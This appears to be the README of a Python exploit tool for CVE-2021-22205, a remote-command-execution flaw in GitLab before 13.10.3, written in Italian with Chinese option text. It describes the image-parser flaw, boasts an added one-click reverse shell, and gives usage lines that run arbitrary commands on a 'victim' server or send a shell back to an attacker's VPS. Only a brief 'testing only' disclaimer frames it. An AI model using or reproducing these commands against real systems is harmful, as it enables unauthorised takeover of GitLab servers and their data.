
Script di exploit in Python per CVE-2021-22205 (GitLab RCE) con funzionalità di esecuzione comandi e reverse shell. Supporta getshell con un clic per i test di penetrazione.
Poiché Gitlab non convalida correttamente i file immagine passati al parser di file, viene eseguito un comando arbitrario. Un attaccante può costruire una richiesta malevola per sfruttare questa vulnerabilità ed eseguire comandi arbitrari sul sistema di destinazione, portando al controllo del server Gitlab. Poiché la maggior parte degli script online non include un reverse shell, ho modificato lo script disponibile online aggiungendo una funzione per ottenere una shell con un clic.
______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
\____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
[-p PORT]
GitLab < 13.10.3 RCE
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
目标URL
-c COMMAND, --command COMMAND
执行命令
--shell 是否反弹shell
-i IP, --ip IP 反弹shell ip
-p PORT, --port PORT 反弹shell端口
python3 CVE-2021-22205.py -t [受害者ip] --shell -i [vps ip] -p [vps port] //反弹shell
python3 CVE-2021-22205.py -t [受害者ip] -c [command] //执行命令
Questo script può essere utilizzato solo per scopi di test, non per altri scopi.